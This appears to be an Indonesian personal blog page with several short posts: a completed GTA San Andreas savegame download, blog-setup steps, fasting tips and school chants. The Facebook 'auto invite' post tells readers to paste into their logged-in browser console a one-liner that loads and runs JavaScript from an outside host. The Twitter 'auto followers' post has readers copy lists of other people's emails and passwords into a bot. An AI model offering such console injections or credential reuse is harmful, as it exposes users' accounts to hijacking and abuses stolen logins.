Great! The file uploaded properly. Now click the 'Verify my file' button to complete the process.

Blog Sukmara

Pages

Kamis, 25 April 2013

Cheat Tamat GTA SAN ANDREAS












Savegame GTA San Andreas ini sudah tamat 100% sehingga sudah tidak ada lagi misi yang harus dijalankan. Semua sudah didapatkan.
Fitur-fitur savegame tamat GTA San Andreas ini antara lain:


  • 100% savegame tamat
  • Uang $999999999
  • Semua wilayah sudah dikuasai
  • Tidak ada perang geng memperebutkan wilayah
  • Fitur hot coffee aktif
  • Status dengan pacar semua 100%
  • Semua pakaian sudah tersedia di setiap rumah
  • Belum pernah di cheat
  • Mobil-mobil modifikasi keren di garasi
  • Level paramedis 12
  • Vigilante 12
  • Pimping level 12
  • 100 Tag
  • 50 Oysters
  • 50 Snapshots
  • 50 Horseshoes
  • 70 Unique Stunts
  • Bike School 100%
  • Driving School 100%
  • Boat School 100%
  • Semua stat kendaraan
  • 1000 Respect
  • 2000 Sex appeal
  • 1000 Gambling Skill
  • Nyawa tak terbatas
  • Armor tak terbatas
  • Amunisi tak terbatas
  • Skill maksimum
Karakter CJ disini juga sudah kebal terhadap peluru, ledakan, jatuh dari tempat tinggi, dan lainnya. Tetapi ada beberapa hal yang dapat membuat kekebalan CJ menghilang. Untuk itu, jangan lakukan hal-hal berikut jika tidak ingin kekebalan CJ hilan.
  • Ditangkap polisi
  • Mati meledak di dalam kendaraan/mobil
  • Mengaktifkan kode cheat HESOYAM

Cara menggunakan Savegame tamat GTA San Andreas

Karena ini savegame bukan cheat tamat GTA San Andreas, maka ada langkah instalasi yang harus dilakukan.
  1. Download savegame melalui link dibawah
  2. Ekstrak file savegame GTASAsf1.b dengan program ekstraktor seperti 7zip
  3. Klik kanan, lalu klik Copy file yang telah diekstrak tadi yaitu GTASAsf1.b
  4. Buka folder GTA San Andreas User Files di My Documents
  5. Klik kanan, lalu klik Paste
  6. Jalankan game GTA San Andreas
  7. Load game GTA San Andreas 100% Completed

Link Download Savegame Tamat GTA San Andreas [62 KB]
via IDWS

DOWNLOAD
via Ziddu

DOWNLOAD

PERHATIAN!!
Savegame ini akan menimpa file savegame yang sudah ada di game GTA kita.
Jika sudah ada file GTASAsf1.b di dalam folder tersebut, ganti nama GTASAsf1.b misal menjadi GTASAsf2.b atau GTASAsf3.b dan seterusnya.
Atau bisa juga dengan melakukan backup dulu file GTASAsf1.b yang sudah ada ke folder lain supaya nanti bisa dikembalikan. Saya sudah pernah mencoba dan berhasil 100% SEMOGA BERMANFAAT.


Sabtu, 22 Desember 2012

Auto Followers Twitter | 20 Desember 2012



Follower Twitter kamu ingin bertambah dengan cepat ??
Caranya gampang banget :D

Peralatan :

Caranya :
  1. Buka dulu ID Twitterlalu copy semua alamat email & password yang ada di situ
  2. Lalu buka Bot Auto Follower, isi "Username" dengan ID Twitter Anda, tanpa @
  3. Lalu paste ID Twitter yang barusan Anda copy tadi, ke kotak yang besar
  4. Kemudian klik "Click Here"
  5. Tunggu prosesnya hingga selesai
Buruan praktekin cara diatas, karena biasanya ID Twitter tersebut tidak bertahan lama.
Credit's : http://cielo-inferno.blogspot.com/2012/12/auto-followers-twitter-20-desember-2012.html

Sabtu, 17 November 2012

Cara Membuat Blog Cepat & Gratis


Langkah awal untuk membuat sebuah blog gratis adalah :


1. Sobat diwajibkan memiliki sebuah alamat email, saran saya pakailah layanan gmail dari google. untuk membuat email dari layanan google tersebut anda bisa langsung menuju ke Gmailuntuk lebih jelasnya perhatikan gambar dibawah ini.

2. Langkah selanjutnya isi data data diform yang disediakan, jangan lupa paling bawah klik Saya menyetujui persyaratan layanan dan kebijakan privacy google, setelah itu klik Langkah berikutnya lihat gambar dibawah. 

3. Selanjutnya, klik kirim kode Verifikasi. lihat lagi gambar dibawah ya :)

4. sekarang cek ponsel anda, jika belum ada kode verifikasi dari google bisa dicoba lagi beberapa menit kemudian, gambar dibawah menggunakan modem, jadi kode verifikasinya langsung bisa di lihat dilayar laptop saya.
5. Masukin deh kode verifikasinya seperti dibawah ini

6. Selamat datang di akun Gmail anda, lalu klik Lanjutkan ke Gmail ya....


7. Sampai disini proses pembuatan akun Gmail sudah berhasil, sekarang ketahap selanjutnya ya...proses pembuatan blog. yaudah tanpa basa basi langsung buka tab baru di browser sobat ya, atau bisa langsung menekan (ctrl + T) buka blogger.com ya.... tinggal isi email dan sandi yang sama seperti di akun Gmail tadi. lalu klik Masuk

8. selanjutnya pilih Opsi profil blogger sobat, jika hanya membuat blogger sebaiknya klik yg sebelah kanan. lalu klik lanjutkan ke blogger. 


9. Sampai tahap ini sobat sudah sukses membuat akun blog, tahap selanjutnya silahkan lihat gambar dibawah ini untuk jelasnya. perhatikan baik baik tahap 1, 2, dan 3. sebelum ada tulisan This blog address is availableberarti nama blog yang ingin sobat buat sudah ada yang memiliki, silahkan ganti dengan nama lain, atau untuk mudahnya bisa tambahkan angka dibelakang alamat blognya, lihat contoh yang saya lingkari pada nomer 2 dibawah. setelah itu klik create blog. 


10. Nah sekarang blog sobat sudah jadi, lihat keterangan dibawah ini, angka 1 adalah Judul blog yang sobat ciptakan pada tahap sebelumnya, lalu angka 2 adalah start posting. alias untuk memulai membuat artikel.

11. Setelah sobat klik start posting, sekarang saatnya sobat membuat sebuah artikel... perhatikan baik baik langkah langkahnya dalam membuat sebuah artikel. tentunya dimulai dari angka 1 ya...hehehe... untuk jelasnya lihat gambar dibawah ini.

Langkah-langkah cara membuat artikel di blog :

Angka 1 : merupakan judul artikel yang nanti akan diterbitkan, boleh apa saja. silahkan berekspresi melalui artikel sobat, narsis juga ga ada yang larang koq :)

Angka 2 : merupakan isi dari artikel, silahkan mengarang bebas, mau curhat, kasih tips, trik, info, atau apa saja yang sobat ketahui, klo artikelnya bermanfaat pasti banyak yang suka dengan blog sobat deh.

Angka 3 : merupakan Label, silahkan isi apa saja. contohnya seperti ini, misalnya judul artikel yang sobat buat adalah Tips melangsingkan tubuh, nah label tersebut bisa di isi dengan Tips sehat, atau yang lainnya. kan ga nyambung seandainya label tsb di isi dengan Ilmu komputer. :p

Angka 4 : Nah tahap ini adalah melihat dulu artikel sebelum diterbitkan, jika ada yang salah bisa dibenarkan dulu sebelum artikel diterbitkan.

Angka 5 : Jika pada tahap 4 sobat sudah yakin, sekarang tinggal klik Publish (Terbitkan)

12. Gambar dibawah ini merupakan contoh artikel yang sudah berhasil diterbitkan. dan untuk melihat artikelnya silahkan klik tombol view. selesai.... nah mudah bukan ?


Credits : http://www.aingindra.com/2012/03/cara-membuat-blog-gratis.html

Kamis, 16 Agustus 2012

Cara Undang Semua Teman ke Group Secara Otomatis dengan Auto Invite Friends to Group



Artikel kali ini mengenai facebook, yaitu tentang Cara Undang Semua Teman ke Group Secara Otomatis atau Auto Invite Teman ke Group. OK langsung coba saja tutorialnya 

Firefox:
document.body.appendChild(document.createElement('script')).src='http://brandablog.googlecode.com/files/AutoInviteFirefox.js';
  • Buka Facebook
  • Pergi ke Group yang dituju
  • Tekan Ctrl+Shift+K
  • Copy dan Paste Code diatas
  • Tekan Enter
Chrome
 document.body.appendChild(document.createElement('script')).src='http://brandablog.googlecode.com/files/AutoInviteChrome.js';
  • Buka Facebook
  • Pergi ke Group yang dituju
  • Klik Kanan
  • Pilih Inspect Elemen
  • Pilih Show Console / Console
  • Copy dan Paste Code diatas
  • Tekan Enter

Video :
SUMBER:http://branda-blog.blogspot.com

Jumat, 03 Agustus 2012

One Direction- What Makes You Beautifiul

Please WatchVideo Music  
One Direction-What Makes You Beautifiul
 
Thanks For Watch This Is From Youtube And Share For sukmara-cendrawan.blogspot.com 

Jumat, 20 Juli 2012

Tips Trik Berpuasa 2012

Okelah berikut adalah Tips Trik Berpuasa  :

Saat Sahur

  1. Coba makan sahur hingga kenyang,Jangan nyampe kenyang banget  heheheheh
  2. Setelah makan,minum air putih sebanyak banyaknya,Jangan nyampe pengen ke WC terus
  3. Usahakan jangan banyak bergerak Nonton Tv,Tidur Jangan Sampe Kelamaan Nanti jadi Gk Sholat Subuh :D  sambil   menunggu adzan subuh. 

  1. Jangan melakukan aktifitas yg berat-berat (kecuali untuk kerja,sekolah dll.)
  2. Jangan melihat orang non islam yang lagi makan (Ya jelas lah)
  3. Disaat siang hari, sebaiknya kalian tidur(Tidur juga ibadah lho tapi jangan kelamaan Nanti Sholat Nya Ketinggalan)
  4. Disaat sore hari, saat kalian ngabuburit mendingan kalian Tadarusan aja,baca qur'an pokonya jngn main layangan yang ada bikin capek  . tadarusan,baca qur'an nya bisa dirumah ataupun di masjid


Saat Berbuka


  1. Usahakan saat adzan maghrib berkumandang, jangan langsung makan makanan yg berat-berat. Cukup segelas air putih saja atau pun teh manis juga bisa 
  2. Setelah selesai sholat adzan baru kalian makan besar ! Usahakan makan makanan yg manis-manis (Kurma dll.)
Oke Mungkin segitu aja Tips Trik Berpuasa yang ada di otak saya hehehe :D  yg bisa   share hari ini buat kalian semoga kalian tetap kuat berpuasa :D hehe,Oh Iye mohon maaf yah kalo blog sukmara banyak salah 

Kamis, 19 Juli 2012

Yel Yel 72 Doevhatoe 247,2012 hheehhe

1)
Waktu Kami Masuk Dupatu....
Kami Masuk Kelas 72.....
Anak-Anaknya yang Keren Kece2 Tapi Sayang Banyak Omongannya...
Lay Lay Lay Lay Lay 72 Paling Alay ...
Lay Lay Lay Lay Lay 72 Paling Lebayy...


2)
Biar Kata Kami Alay....
Tapi Kami Okay-Okay
Oo....I Love Seven Two
Biar Kata Kami Lebay ....
Tapi Kami Pintar-Pintar
Oo....I Love Seven Two
Aku Cinta Tujuh Dua aa....aa
Sayang Ini Hanya Untukmu.....Untukmu....Untukmu

72..!  Go..Go..Go

Sekian Yel-Yel Dari 72 hahahahah Mantap Gak! Buatan Kk Osis Yang Cantik/Ganteng Gitu Lohh Kak Anis,Kak Nia,Kak Farizz  Comennt All